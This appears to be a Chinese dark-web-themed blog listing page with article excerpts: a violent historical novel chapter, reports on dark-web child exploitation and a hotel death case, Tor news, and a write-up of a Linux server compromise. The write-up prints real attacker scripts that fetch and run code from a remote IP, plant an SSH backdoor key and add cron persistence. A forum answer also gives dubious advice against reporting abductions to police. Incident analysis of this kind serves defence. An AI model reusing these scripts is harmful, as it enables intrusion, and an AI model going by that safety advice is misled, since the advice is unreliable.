• 什么是Tor?Tor浏览器更新有什么用?什么是Tor?Tor浏览器更新有什么用?
  • 难怪马斯克裁掉整个安全部门,推特540万用户数据在暗网公开难怪马斯克裁掉整个安全部门,推特540万用户数据在暗网公开
  • 中华人民共和国网络安全法中华人民共和国网络安全法
大横幅1
大横幅2
到期时间:永久 到期时间:推广
到期时间:推广 小横幅4
今日发布0篇文章 | 本站共发布了2049篇文章
  • 浊世奇人

    一、第一个二货 谎言听上去都那么合情合理,真相却总是荒诞不经。 吴晋的生命中出现过三个最重要的二货,第一个是他的爸爸“赵子龙”。 当时世界上正在同时进行着两场超级内战,一场是美国的南北战争,另一场是大清的太平天国运动。两国的主政者,一位是五十五岁的林肯,一位是八岁的同治皇帝。五十五岁的林肯被战争搞得焦头烂额,八岁的同治皇帝无忧无虑地在皇宫里放风筝,开打的时候他妈杏儿还没进宫。 杏儿,大名杏贞,叶赫那拉氏,徽号慈禧。 “赵子龙”是为了躲避战乱逃亡到苗集的,带着他十七岁的小娇妻,小娇妻已身怀六甲。小两口受到了苗集百姓的热情款待。苗集人觉得他长得太清新脱俗了,像戏台上赵子龙,就叫他“赵子龙”了。 苗集人不会太多的词汇,只能用一个字来形容“赵子龙”——俊,用三个字形容他的小娇妻——俊得很。俊发“zun”的音,四声。小娇妻长得像白娘子,比戏台上的白娘子还俊,还白,还细嫩。虽然是逃亡至此,但小两口仍旧十分整洁光鲜,举手投足都体现着书香门第的风范。 因感恩于苗集乡亲的救助,“赵子龙”号召大家跟着他们一起跑,因为绿营军很快就会杀过来,他的家乡已经被绿营军屠了。 杯具的是,木有人信。 此地距离战场较远,苗集民风淳朴,百姓历年来响应朝廷号召,为剿灭叛军捐钱纳粮,筹集军饷,十分踊跃。镇上好几户人家世代都是绿营军,父死子继,全镇人都引以为荣。绿营军就是他们的子弟兵,怎么可能返回头来杀自己的父老乡亲?简直就是千古奇谈!可笑至极! “白娘子”说:“劝不动咱就走吧,该说的咱都说了。” “赵子龙”不忍看到善良的苗集百姓像家乡父老一样被屠戮,不顾妻子的劝阻,在集上奔走呼号,挨家挨户敲门,泣血相告,跪求大家逃命,终于凭实力犯了众怒。如此污蔑朝廷正规军,苗集百姓忍无可忍,终于翻脸了。小两口被几十个百姓追得满街乱窜。 “赵子龙”虽然有着赵子龙的俊秀,却没有赵子龙的身手,被愤怒的百姓当街摁倒,整洁的衣衫被撕扯的七零八落,英俊的脸庞被揍肥了一圈,鼻梁骨都打断了。大着肚子的“白娘子”也被抽了十几个嘴巴,白嫩的小脸被抽成了绯红,浑身被吐了十几口痰。 “我亲眼看见他们杀人了,我的父母兄弟都被他们杀了。快跑吧,再不跑就来不及了……” “赵子龙”喊得越响,众人下手就越重,最终他喊不出来了,放弃了。 苗集里长声色俱厉、义正辞严地对小两口进行了训斥。小两口认罪了,只求能放他们走。但里长和百姓不同意,正要绑了送衙门,绿营军到了。 里长和乡亲们把小两口扭送到了参将面前,揭发了他们造谣污蔑绿营军的罪行。参将很赞赏地表彰了里长和乡亲们,然后手起刀落,里长的脑袋一歪,倒挂在了脖子的一边,像个夜壶,鲜血斜喷出一丈多远。 里长这一生从未如此豪放过。 满街的惨叫此起彼伏地传来。现场乡亲们的心情无可描述,大脑中一片空白。那叫声中的绝望,只有过年杀猪的时候才能听到。人们终于亲眼目睹了小两口描述中的屠杀。几十名跪在地上的百姓像被收割的庄稼,一片一片倒在了绿营军的刀下。待宰的猪羊尚能在临死前发出生命中最后的绝唱,他们连呼喊和挣扎的勇气都没有了,胖揍“赵子龙”时的义愤填膺、满腔正义消失得无影无踪,在沉默中被驱逐出了这个世界。 小夫妻俩的膝盖被百姓的血染红。他们在家乡逃过了屠杀,却把命送在了苗集。“赵子龙”悔悟了,泪流满面地捧着小娇妻的脸,十分的愧疚、自责,“听你的就好了。” 小娇妻已不忍心再责备“赵子龙”了,也捧着他的脸,给了她一个笑容,“也挺好的,一起上路,不害怕。” “赵子龙”感觉到脑后一阵凌厉的风吹过,接着脖子一凉,腔子里的鲜血飞溅而出,染红了小娇妻的脸。 “好!”周围爆发出一阵喝彩,掌声雷动。 参将第一刀没有砍掉里长的脑袋,有点沮丧,这次调整了角度,刀身从“赵子龙”脖子上划过,脑袋却像还长在身体上,鲜血从脖子的裂缝中四面八方喷射,像一道喷泉,被传说了很久。 参将不舍得就这么杀了这位花容月貌的“白娘子”,虽然她已身怀六甲,但并不妨碍他发泄兽欲。可惜“白娘子”没给他这个机会,她抽出了一把防身的匕首,一刀刺进了自己的心窝。 参将很沮丧,一刀划开了她,从眉心自下,一直到两腿中间,劈开了一道二尺长的口子。 小夫妻俩如愿结伴而行了。 全镇和周边几个村子全被屠杀殆尽,男女老少,一个没留。男人直接杀,女人先奸后杀。 有点意外,这支队伍里居然真有一名绿营军就是苗集籍的,他虽然没有动手,但却眼睁睁地看着父老乡亲被战友们屠杀,他的父母兄弟也死于这场屠杀中,而他没有阻拦。 他为什么没阻拦呢?这个问题追了他半辈子,每次一冒出来,他就赶紧找别的事儿干,转移注意力,实在躲不掉了,只好面对,每次都能说服自己。 那些绿营军砍下了上千只手,连同之前砍掉的一起,奏报朝廷,说斩杀了上万叛军。满朝文武弹冠相庆,杏儿乐得花枝乱颤,参将被擢升为总兵。 不止是皇帝懵懂无知,整个大清就是个萌神,纯洁的像四岁的小姑娘,五岁就没这么好骗了。 在平定太平天国的战争中,湘军淮军风头出尽,而朝廷的正规军却被太平军追得满地跑,很没面子了。绿营军打仗不行,但是要脸有一套,想出了这么一招,杀老百姓,用老百姓冒充叛军,向朝廷邀功请赏。 这部书的很多情节都在历史上真实发生过,在各种稗官野史、笔记小说里都有记载,经作者加工串联而成。读者觉得荒诞的部分,可能都是真事儿。 吴晋一直待在妈妈的肚子里,等着横空出世,但妈妈一直不使劲儿,他只好自己从妈妈那娇嫩的肚皮里顶了出来。 吴晋来到人世间看到的第一个场景,就是琳琅满目的死人,人都是横着的,血流成河。吴晋以为走错了,跑到地狱里来了,想退也退不回去,正彷徨间,一个戴着翡翠珠帽、二尺来长的小男孩竖着跑了过来,诧异地望着这个从死尸的肚皮里钻出来的小动物。 “爹,娘,这有个小孩儿,活的。”小男孩回头喊道。 小男孩喊来了一对二十来岁的青年夫妇,一家三口小心翼翼地剪断了吴晋的脐带,彻底切断了他要回头的路。 吴晋忽然就不哭了,瞪着眼睛观察着这一家三口,笑了。 一家三口为这件事争论了十几年,吴豫坚持认为吴晋确实笑了,但父母一直觉得吴豫是看错了,小孩子不可能一出生就会笑。 吴晋遗传了“赵子龙”和“白娘子”的优良基因,五官晶莹剔透,象雕刻出来的,神似吴台玉佩上那个正在拜观音的童子,浑身上下带着一股仙气儿。尤其是两只清澈通透的小眼睛,看一眼就仿佛被过滤了一遍。 一家三口对这个捡来的小童子爱不释手。是少爷吴豫第一个把吴晋从娘肚子里扒出来的,他执意认为吴晋是他的孩子,应该管他叫爸爸。经过协商,吴豫妥协了,勉强当了个哥哥,因为他只比吴晋大五岁。 从此吴晋成了吴家二少爷。 吴家没想到的是,他们捡了个天才。 吴家也和吴晋的父母一样,逃难到了苗集,只是他们运气比较好,在绿营军离开后才来的。吴豫降生在豫中一带,所以叫吴豫。吴家是在晋地捡到了吴晋,他就叫了吴晋。 吴豫的父亲叫吴台,出身徽商世家,长得白白胖胖,像一尊弥勒,永远笑呵呵,不管遇到什么难事,只要见到他那张嘴角上挑、眼睛眯缝的笑容,烦恼马上去了一半。吴台喜欢给人讲笑话,给别人带来快乐,是他最快乐的事。 吴台的妻子出身书香门第,温婉贤淑,心软,喜欢救济穷人。 太平军覆灭了,天下终于太平了,吴家迁回了徽州。商人吴台继承祖业,再创辉煌,短短数年,重新积累了万贯家资,在多地设立了分号。 大少爷吴豫不爱读书,喜欢舞枪弄棒,练了一身武艺,从小立志要精忠报国。吴晋正好相反,不但酷爱读书,而且有过目不忘之能。一篇文章,十岁的吴豫一天都背不下来,五岁的吴晋过目成诵。 吴晋十岁替吴豫考中了秀才,十三岁替吴豫考中了举人。 吴晋为什么要替吴豫考呢? 因为吴晋知道了自己的身世。 吴家在苗集不但救了吴晋,还救了一个十八九岁的小伙子,名叫苗全。苗全被绿营军捅了两刀,砍掉了一只手,但没死,被吴家救了。因为苗全会打算盘,吴家就把他留在身边算账。 吴晋的父母被苗集百姓扭送到参将面前的时候,苗全也跟着去了,目睹了那场惨案的全过程。吴晋八岁那年,苗全喝了点酒,心怀愧疚地对他讲述了那件悲惨的往事。 八岁的吴晋沉默了一个下午,回到家,恭恭敬敬地给吴台夫妇磕了三个响头,辞去了二少爷的身份。 吴家对他恩重如山,他要报恩,一辈子做吴家的奴仆。 吴夫人抱着吴晋哭了一晚上,从来笑呵呵的吴台收起了笑容,和吴豫一起把苗全骂得狗血淋头。然而吴晋心意已决,把自己放在了和苗全一样的位置,要一生服务于吴家。任凭吴豫骂他读书读坏了脑子,但改变不了他的心意。 有一点没变,吴晋仍旧管吴台叫爹,管吴夫人叫娘,管吴豫叫大哥。 从少爷自动降格为家奴,这不是什么人都能做到的,何况还是个八岁的孩子。吴台原以为,吴晋将来一定能成长为一个谨守仁义礼智信的谦谦君子。但吴晋十二岁那年,展露了另外一项天赋,令吴台十分担心,这货将来必定是个混世魔王。 ...

    2020-04-26 688
  • 5岁取悦男性,14岁参加成人派对,暗网的恋童产业有多可怕?

    我们常常会产生一种错觉,仿佛自己能够看到的网络世界就是全部。 可事实上,像这些能够通过常规网络检索就获取到的内容,不过只是冰山的一角,在未知的海面之下,还有需要通过特殊操作或者个别软件辅助才能够浏览的 暗网。 其大小或许是普通网络的400到550倍,而大部分内容却极其黑暗、变态,令人看一眼就脊背发凉甚至开始怀疑人生。 客观来讲,暗网里并不全是非法行为,也有很多正常操作,一些人会在里面的社交媒体上进行互动,也有书迷、影迷俱乐部,以及唱歌比赛等等。 因为暗网独特的匿名性,用户们的隐私能够得到保护,这点曾被不少人称赞。但凡事都有两面性,因为不容易追查到本人, 这里于是滋生了很多犯罪行为,也让很多人得以肆无忌惮地释放内心的黑暗面。 其中,相对而言不太严重的违法行为有:贩卖假护照、假的大学学历以及假的奢侈品等。 再严重一点就是毒品贩卖,暗网上的价格一般会低于市面上的“常规”价格,此外,还会销售一些致命的化学物质以及军火武器等。 然而比起这些非法买卖,暗网上还有更多会让人产生生理不适,甚至挑战人承受底线的内容。 比如,动物虐待,还有一个网站专门用来PO死去的婴儿,他(她)们被打扮得好好的,仿佛还活着,而大部分用户都是无法接受自己孩子已经死去的妈妈们。 但这仍不是最不可思议的,在暗网上还有令人深恶痛绝的人口贩卖和杀手雇佣业务,以及一些确实存在但内容真实性尚未被官方证实的论坛,比如,一些人会在里面讨论如何食人以及被食,甚至安排线下聚会互相食用对方身体,还有的网站会绑架无家可归的人去进行残酷的人体实验,而更让人无法接受的还有直播杀人和折磨人,这类网站要先支付一定数额的比特币才能进入。 但在所有的网站中,有一类最“受欢迎”,其网站数量未必有以上提到的那些内容多,但流量却最大,那就是 儿童性侵。 根据朴次茅斯大学的Gareth Owen博士几年前的研究表明, 暗网上甚至超过80%的流量都来自这些儿童性虐待网站。 半个多月前,VICE News发布了一个视频,里面记录的就是美国警方联合菲律宾当地的反人口贩卖组织,透过暗网抓捕两个皮条客的真实过程。 其中一个罪犯是菲律宾的一位妇女,她主营线上的儿童性爱直播,常在暗网上散布包括自己女儿在内的女童们表演的性暗示动作以招揽生意。 (图源:YouTube) 警方假扮成恋童癖前去询问性爱视频的购买,在问到女孩们都会做什么时,卖家的描述非常下流不堪, 7名女孩,最小的才5岁,最大的也不过13,但她们却已经学会如何玩弄一些技巧去取悦成年男人,她们的房间内到处都是性玩具。 在美国,每一天都有成千上万的人去购买这些儿童的线上直播。每进账一笔,都意味着又一名无辜的少女被强奸。 而这类交易除了线上,还分线下,视频中警方的另一个抓捕对象负责的就是这种业务。他会带着小女孩让客户当面验货,一边下流地抚摸女孩的皮肤,一边推销说:“她的皮肤非常滑”。 更可怕的是,他手里有100多个这样的女孩可以卖,而且年龄都在15岁以下。 谈好后,对方带着一小帮女孩去警方事先埋伏好的房里开性爱派对。很难想象,这些小女孩们进门后没有丝毫恐惧,就在一旁打打闹闹,听着皮条客和陌生男人谈论自己活好而且什么都能做,却没有任何反应,仿佛早就习以为常。 在警方解救她们时,女孩们最先想到的不是“我获救了”,而是哀求警方不要抓自己,在她们尚未成熟的思想里,究竟是怎样看待自己的?皮条客们平时都给她们灌输了怎样的观念? 在最应该被爱护的年纪,在同龄人都在上学、过着无忧无虑的生活时,这些女孩却在面对着这个世界上最肮脏的交易,和来自成年人最大的恶意。 获救后女孩们接受了心理治疗,看到这些孩子们一边痛哭一边愤怒地捶打地面发泄情绪,实在太让人难受。 目睹了她们的经历,相信没有人会不感到愤怒,我们都希望能尽快将这些皮条客和恋童癖一网打尽, 然而,现实却令人绝望,这类网站屡禁不止,而且随着网络的发展越发严重,想要彻底禁止儿童性侵这一利益庞大的产业,谈何容易。 15年,这些美国专家们分析过的儿童性暴力视频的总时长是:100年,听着都让人绝望。但这仍然不是全部。 当地政府部门甚至研究表明,有一半的人都承认看过儿童色情片,其中更是有人真的玷污过女童, 恋童癖远非我们想象中的一小部分群体。QQ群号:979727860 点击链接加入群聊:https://jq.qq.com/?_wv=1027&k=FDmmUxxL ...

    2020-04-26 1092
  • 世界悬案:蓝可儿死亡真相被揭开,凶手就在她旁边

    2013年2月19日加拿大籍华人蓝可儿的尸体在美国洛杉矶塞西尔酒店楼顶的水塔内被发现,然而此案至今都存在疑点。蓝可儿死亡地点的奇怪和她失踪前在电梯里的奇怪举动,让很多人觉得此案可能是灵异事件。 蓝可儿的尸体被发现的时候,全身赤裸以头朝下脚朝上的姿势沉在酒店的水箱底部。警方为了捞出尸体,也费了很大的功夫,派出了20多位消防员,用了一个多小时才将蓝可儿的尸体捞出来。然而此案最让人疑惑的就是她在电梯中的举动,从监控视频中可以看到她按了电梯的每个楼层,而且电梯的门也一直没有关闭,蓝可儿一会儿走出去一会儿走进来,甚至还躲在了电梯旁边。后来这一案件引起了全世界的关注,也有人注意到了一些线索,并作出了解释。 蓝可儿进电梯之前应该是在和别人交流,然后有人帮她那了电梯,对方显然很熟悉酒店的构造,也知道电梯里有摄像头,所以从未露面也就没有被摄像头拍到,这也意味着当时此人已经对蓝可儿有了杀意。而且当时酒店里的一个房客表示住在那家酒店的大部分是长期住户,还有一部分是游客。有人表示当天晚上曾听到楼道里有吵闹声,而且当天酒店有些房间的地板还被水淹了。 当时酒店的住户最无法接受的是,蓝可儿尸体的发现意味着他们过去几天引用的水竟然是“尸水”。有住户表示她们确实觉得水的味道怪怪的,但并没有多想。而警方后来也提取了这些水去检测,酒店也即使更换了用水。但最让人好奇的是蓝可儿在电梯中的举动,看上出是灵异事件,但也有人给出了合理的解释。 蓝可儿之所以进电梯随意按了些楼层,是因为她在等男朋友来找她,所以她才会有走进来又走出去这样的举动。而她躲在角落里是因为听到外边有声音所以才躲起来。电梯门一直没关可能是男朋友在外边按着开关,后来她还是决定跟男朋友走了,所以电梯恢复了正常。而这些行为很有可能是两人吵架了在闹别扭,后来男友可能出于别的心理真的对她痛下杀手。而警方给最后给出的结论是蓝可儿是意外溺死,她生前患有躁郁症。希望有一天一切能水落石出,让死者安息。 ...

    2020-04-26 1021
  • 暗网简史,朋克主义的地下世界

    我们一般人浏览的互联网,可以追踪到地理位置以及通信人身份,统称为明网。 与此相对,暗网是个地下世界,服务器地址和传输数据都匿名匿踪,只能通过特殊软件授权,对电脑设置以后才能连接到的网络。 近日5.38亿条微博数据在暗网销售,1.72亿条有账号基本信息,比如手机号,其中不乏明星大V,这些数据的暗网售价0.177比特币,折合人民币不到7500元,之后微博回应,手机号是去年被人利用通讯录接口批量导入,暴力匹配出来几百万个账号和昵称,并没涉及身份证、密码等敏感信息。 非法数据、假钞、毒品、武器......各种黑色交易应有尽有,相比较明网,暗网的神秘,透漏着贪婪、放纵和令人恐惧的气息,我们大多数人对此所知甚少,只知道还有个不能被搜索引擎收录追踪的网络世界。 比特币为首的加密货币,和暗网一样不受市场监管,在地下网络中,加密货币是通用交易模式,也是ICO最大的应用市场。换句话说,正是因为2009年比特币的出现,才催熟了暗网在世界上的流行。 但真正的暗网历史,几乎和互联网一样悠久。 02 新型技术早期,赞助者大多是美国军方。 阿帕网(ARPAnet)是全球互联网鼻祖,ARPA是美国国防部旗下高级研究计划局(Advanced Research Project Agency)首字母简称,ARPA旗下核心机构之一是信息管理处(IPTO),主要负责研究电脑图形、网络通讯、超级计算机等课题,也是这个IPTO研发出了阿帕网。 信息管理处最早的负责人名叫利克莱德(J. C. R. Licklider),1962年加入IPTO,在任期间赞助了当时美国70%左右的计算机科学研究,在他1963年发给同事的备忘录内容中,成功预见了阿帕网和图形界面的诞生。 IPTO的第三任继任者名叫泰勒(Bob Taylor),这个人对互联网的意义重大。1965年加入IPTO,泰勒希望建设一个计算机网络,能把ARPA资助的大学和企业实验室的项目小组连接起来,就是阿帕网的最早雏形。 为了能把各项目组的局域网连接在一起,泰勒1967年邀请日后成为“阿帕网之父”的拉里罗伯茨(Larry Roberts)加入IPTO,1969年底,阿帕网成功投入运行。发展到1975年,阿帕网终于把大部分美国大学和研究实验室的局域网连接在了一起。 这期间,发生了世界上第一笔网络交易,一个斯坦福大学的学生,通过阿帕网账户和一个麻省理工学院的学生达成交易,略有讽刺意味的是,有史以来首次电商交易的货物是毒品。 泰勒后来进入施乐实验室(帕罗阿图研究中心),1973年成功研发出来Alto(世界上首台个人电脑),包含图形界面、以太网、显示器和一种三键鼠标,这件事最终成就了乔布斯。 乔布斯1979年参观施乐实验室,看见Alto以后兴奋不已,乔布斯回忆时说道,“我当时看到了计算机产业的未来。”此后故事我们耳熟能详,苹果陆续推出Apple Lisa和Macintosh,为iMac奠定了基础。 早期的阿帕网,实际上就是把局域网按照固定协议连接在一起,当时还出现了很多并行的同类网络,那些不愿意或者没来得及接入阿帕网主干的网络节点,因为找不到也无法连接,这些就被人叫作Darknet,也就是暗网,早期暗网和黑市并没联系。 03 80年代,数据避风港横空崛起。 类似今天国内很多**屏蔽敏感词**类黑灰产业,运营者选择把服务器放在国外,利用其他国家开放的法规政策,然后偷梁换柱,把黑灰产业通过互联网引渡给国内用户,套取利益同时还逃脱了国内法律制裁,类似的公开报道已经屡见不鲜。 美国80年代末期的情况类似,那时Internet还不通用,苹果、IBM、康懋达(Commodore)等个人电脑品牌问世不久,全球各种网络雨后春笋一样冒出来,人们通过电子邮件、BBS和USEnet等应用沟通,互联用户大多是一些精英人群。 很多网站运营者担心数据存储的安全性,同时也为了避税、灰色经营等不同目的,大量企业把服务器选择安置在一些法律宽松的国家,以免被政府控制,这些数据避风港的网站算得上是第二批暗网。 值得一提的是,最知名的数据避风港企业诞生于2000年,在私人国家西兰公国领土经营,西兰公国原本是英国二战期间建于公海上的一座防控堡垒,二战结束后废弃,一名前英国退役军官罗伊(Roy Bates)1967年占领,然后歪解国际法宣布独立为国家。2000年8月份,“西兰王子”迈克尔(Michael Bates)收购一家英国公司,改名为HavenCo。 HavenCo创始人兼CEO是“密码朋克”小组成员肖恩(Sean Hastings),一个典型的无政府主义者,HavenCo成立之初获得大量知名媒体报道,之后2008年11月,没有任何公告便停止运营了。肖恩现在也致力于在公海建立永久住所,意在复制西兰公国模式。 04 摇滚、嬉皮士、乌托邦、赛博朋克,在美国的60-80年代接踵而至,滋养出90年代“密码朋克”这么个精英群体,为暗网和区块链留下浓墨重彩的一笔。 “赛博朋克”创造了各种科幻小说,知名的有《黑客帝国》、《阿丽塔》、《银翼杀手》等,科幻届时在美国形成一股社会风潮,其核心主张影响至今,主要是嘲讽和警示科技文明与现实宇宙越来越模糊的界限。 “赛博朋克”的影响下,密码学开始迅速发展。 英国政府通讯部(GCHQ)的两名密码学家,詹姆斯(James Henry Ellis)和克里福德(Clifford Christopher Cocks)早在70年代早期就提出了公钥加密的概念,不过那时由政府主导,这个技术不仅未被采用,还遭到了雪藏。 1976年,密码学家惠特菲尔德(Whitfield Diffie )和马丁(Martin Hellman)提出了非对称加密技术,并出版了《新密码技术指南》这本书籍,成为日后互联网加密技术的基石。 90年代,互联网受到广泛应用,3个密码学家蒂姆.梅(Tim May)、埃里克(Eric Hughes)、约翰(John Gilmore)成立了一个小组,他们每月会在约翰创立的公司讨论密码学、政治、哲学、计算机技术等各种先锋话题。 这个讨论小组的人数越来越多,之后他们编码了一套加密邮件系统,可以让更多技术极客匿名交流,这个邮件列表,被一位名叫裘德(Jude Milhon)的女成员命名为“密码朋克”。他们之中很多人,在互联网发展历史中都有举足轻重的地位。 创始人蒂姆.梅是英特尔科学家,约翰是太阳公司第5号元老,其他的重量级成员更多,维基解密创始人阿桑奇(Julian Assange)、万维网发明者蒂姆(Tim-Berners Lee)、比特币创始人中本聪、BT下载创造者布拉姆(Bram Cohen)、PCG 1.0和2.0的两个作者...... 创始人之一埃里克早期发布的《密码朋克宣言》中写到:“我们希望拥有隐私,创建允许匿名交易的网络,我们致力于构建匿名系统,通过数字签名和加密货币来捍卫隐私”。 “密码朋克”的匿名邮件系统,是一种新的暗网。 “密码朋克”1997年达到顶峰,平均每天约有30封邮件,大约2000个用户,基本都来自最知名大学/企业/实验室的教授大神们,2001年9/11以后,人们的讨论积极性开始衰减,话题逐渐变得无趣,不久后宣告解散。 “密码朋克”同时期,MP3技术开始变革音乐产业,CD歌曲可以压缩为MP3格式,然后上传在网上下载,这一技术大大冲击了CD音乐的版权市场,可能也是互联网最早的“共享”模式。 一个名叫Napster的MP3音乐共享网站,2000年前后遭到美国重金属乐队Metallica创始人拉斯(Lars Ulrich)的起诉,Napster网站很快倒闭了,但这种模式开始爆发。 人们通过邮件或者其他隐藏方式共享MP3音乐,也属于暗网。明星们纷纷抵制,但用户已经习惯了免费歌曲,直到演化成当下的流媒体形式。QQ群号:979727860 点击链接加入群聊:https://jq.qq.com/?_wv=1027&k=FDmmUxxL ...

    2020-04-26 853
  • 抖音视频无水印在线解析

    一键去除,快捷方便,永久免费。 地址:http://tv.dufengvip.cn/dy.html...

    2020-04-26 862
  • 被抓到暗网如何逃生?

    这个得全方位分析 我就设一种最常见的情景 对方是一个组织,目的宰了你 你的身体素质一般 心理素质一般 所有电子设备被没收 方便更是荒山野岭或者是他们基地的老窝 如果你们语言相通 如果他是为了直播,时间还没开始 你可以尝试着通过巧妙利用语言学查询现在所处位置的大致情况 如果你被捆绑 对方是一个不愿多言的粗汉 你可先表达出对世界无感,死就死了的态度 (如果对方目的是为了获得虐待的快感,他们会激动起来的,假设情绪变差不大) 然后无意间就说“我想看看这个世界最后的运转情况,把绳子解一下,ok?(语气要平淡且漠不关己)”成功解开,之后,不要激动(因为前提有你是一个心理素质一般的) 前观察地形,以及一切可利用的工具 然后你可以接近那个粗汉 现扯一些有的没的,获取“不必要的”信息(例如,对方的兴趣,或者抓的人的年龄段) 问他“像我这样的小白鼠,一个你们大概能盈利多少钱” 他们会回答的,相信我 然后,你就说“虽然我有在隐瞒,但我想你应该也能猜出来一些,我已经对死亡无欲无求了,既然这样,你们想不想有更稳定的小白鼠来源呢” 这里语气要玩味,然后不等他开口就自言自语似的“真想让他们也死呢” 注意,语气要玩味,如果表情能够在戏谑一点更好 注意,分析地形要用余光分析,不可来回走动(他们不是傻子) 如果压根解了绳子就不理你呢? (如果不理你,跳过上这一步) 来回走动,但不要表现的有走到意思(前前后后都要变现的无欲无求,置之生死) 表现的不要有“我是一个即将被你们杀死的人,我要躲着你们” 而是主动接近 甚至表现出自己可以被利用! 如果他们选择利用你 那么你获生的希望将无穷大(不要到当地警察局报案) 如果他们不理你 横竖都是死 语气表现的很狼狈,在摄像机下被玩弄 不如,不如,停止这个假设! (像逃生简单么?不简单。这个的前提是,他们的组织规模并不算大,且他们需要钱或者物的来源。而且,你还得能临危不乱) 被抓,也是没有一个特定的标志的 尽量不要吃陌生人的东西 不要独自走在人少或者不熟悉的地方 不要在当地政府报案 报案前先做好证据备份,以及发送到互联网之中(例如国内外知名网站) 最后,向天祈愿 暗网本身无罪 是有罪的人将他视为一个工具 因为这个问题,在刚开始,我想到的是批斗 太多人迷失在了充满谎言的网络世界里 QQ群号:979727860 点击链接加入群聊:https://jq.qq.com/?_wv=1027&k=FDmmUxxL ...

    2020-04-24 962
  • Tor项目裁掉了三分之一的员工

    Tor项目以及Tor隐私浏览器背后的组织,在周五宣布,由于冠状病毒大流行造成的经济负担,将解雇三分之一的员工。   Tor项目的执行主任Isabela Bagueros周五在其网站上发表声明说:“Tor和世界上很多地方一样,已经陷入了COVID-19危机。” 他说:“和许多其他非营利组织和小企业一样,金融危机给我们带来了沉重打击,我们不得不做出一些艰难的决定。我们不得不放弃13位伟大的人物,正是他们让全世界数以百万计的人能够接触到Tor。” “我们的核心团队将由22人组成。” Bagueros表示,尽管裁员,目前的团队将能够继续运行其服务器和软件。这包括Tor anonimity网络和Tor浏览器包。 Tor项目的决定是任何人都能预料到的。这家总部位于美国的非营利组织完全依靠捐款生存。 每年,该项目都会在年底举办一场捐赠活动,以支持下一年的财务状况。 由于大多数捐助者(用户、美国政府和私营部门)都把重点放在如何度过COVID-19的经济危机上,Tor团队似乎在筹集资金以支持自己渡过大流行方面遇到了问题。 Tor项目并不是唯一经历困难时期的组织。其他公司也被迫解雇员工。该榜单包括特斯拉、百思买、GAP、梅西百货、Yelp、迪士尼、Vox Media等大品 ...

    2020-04-20 666
  • 记一次linux(被)入侵

    0x00 背景 周一早上刚到办公室,就听到同事说有一台服务器登陆不上了,我也没放在心上,继续边吃早点,边看币价是不是又跌了。不一会运维的同事也到了,气喘吁吁的说:我们有台服务器被阿里云冻结了,理由:对外恶意发包。我放下酸菜馅的包子,ssh连了一下,被拒绝了,问了下默认的22端口被封了。让运维的同事把端口改了一下,立马连上去,顺便看了一下登录名:root,还有不足8位的小白密码,心里一凉:被黑了! 0x01 查找线索 服务器系统CentOS 6.X,部署了nginx,tomcat,redis等应用,上来先把数据库全备份到本地,然后top命令看了一下,有2个99%的同名进程还在运行,叫gpg-agentd。 google了一下gpg,结果是: GPG提供的gpg-agent提供了对SSH协议的支持,这个功能可以大大简化密钥的管理工作。   看起来像是一个很正经的程序嘛,但仔细再看看服务器上的进程后面还跟着一个字母d,伪装的很好,让人想起来windows上各种看起来像svchost.exe的病毒。继续 ps eho command -p 23374 netstat -pan | grep 23374 查看pid:23374进程启动路径和网络状况,也就是来到了图1的目录,到此已经找到了黑客留下的二进制可执行文件。接下来还有2个问题在等着我: 1,文件是怎么上传的? 2,这个文件的目的是什么,或是黑客想干嘛?   history看一下,记录果然都被清掉了,没留下任何痕迹。继续命令more messages, 看到了在半夜12点左右,在服务器上装了很多软件,其中有几个软件引起了我的注意,下面详细讲。边找边猜,如果我们要做坏事,大概会在哪里做文章,自动启动?定时启动?对,计划任务。 crontab -e 果然,线索找到了。 0x02 作案动机 上面的计划任务的意思就是每15分钟去服务器上下载一个脚本,并且执行这个脚本。我们把脚本下载下来看一下。 curl -fsSL 159.89.190.243/ash.php > ash.sh 脚本内容如下: uname -a id hostname setenforce 0 2>/dev/null ulimit -n 50000 ulimit -u 50000 crontab -r 2>/dev/null rm -rf /var/spool/cron/* 2>/dev/null mkdir -p /var/spool/cron/crontabs 2>/dev/null mkdir -p /root/.ssh 2>/dev/null echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDfB19N9slQ6uMNY8dVZmTQAQhrdhlMsXVJeUD4AIH2tbg6Xk5PmwOpTeO5FhWRO11dh3inlvxxX5RRa/oKCWk0NNKmMza8YGLBiJsq/zsZYv6H6Haf51FCbTXf6lKt9g4LGoZkpNdhLIwPwDpB/B7nZqQYdTmbpEoCn6oHFYeimMEOqtQPo/szA9pX0RlOHgq7Duuu1ZjR68fTHpgc2qBSG37Sg2aTUR4CRzD4Li5fFXauvKplIim02pEY2zKCLtiYteHc0wph/xBj8wGKpHFP0xMbSNdZ/cmLMZ5S14XFSVSjCzIa0+xigBIrdgo2p5nBtrpYZ2/GN3+ThY+PNUqx redisX' > /root/.ssh/authorized_keys echo '*/15 * * * * curl -fsSL 159.89.190.243/ash.php|sh' > /var/spool/cron/root echo '*/20 * * * * curl -fsSL 159.89.190.243/ash.php|sh' > /var/spool/cron/crontabs/root   yum install -y bash 2>/dev/null apt install -y bash 2>/dev/null apt-get install -y bash 2>/dev/null   bash -c 'curl -fsSL 159.89.190.243/bsh.php|bash' 2>/dev/null 大致分析一下该脚本的主要用途: 首先是关闭SELinux,解除shell资源访问限制,然后在/root/.ssh/authorized_keys文件中生成ssh公钥,这样每次黑客登录这台服务器就可以免密码登录了,执行脚本就会方便很多,关于ssh keys的文章可以参考这一篇文章SSH原理与运用。接下来安装bash,最后是继续下载第二个脚本bsh.php,并且执行。   继续下载并分析bsh.pbp,内容如下: sleep $( seq 3 7 | sort -R | head -n1 ) cd /tmp || cd /var/tmp sleep 1 mkdir -p .ICE-unix/... && chmod -R 777 .ICE-unix && cd .ICE-unix/... sleep 1 if [ -f .watch ]; then rm -rf .watch exit 0 fi sleep 1 echo 1 > .watch sleep 1 ps x | awk '!/awk/ && /redisscan|ebscan|redis-cli/ {print $1}' | xargs kill -9 2>/dev/null ps x | awk '!/awk/ && /barad_agent|masscan|\.sr0|clay|udevs|\.sshd|xig/ {print $1}' | xargs kill -9 2>/dev/null sleep 1 if ! [ -x /usr/bin/gpg-agentd ]; then curl -s -o /usr/bin/gpg-agentd 159.89.190.243/dump.db echo '/usr/bin/gpg-agentd' > /etc/rc.local echo 'curl -fsSL 159.89.190.243/ash.php|sh' >> /etc/rc.local echo 'exit 0' >> /etc/rc.local fi sleep 1 chmod +x /usr/bin/gpg-agentd && /usr/bin/gpg-agentd || rm -rf 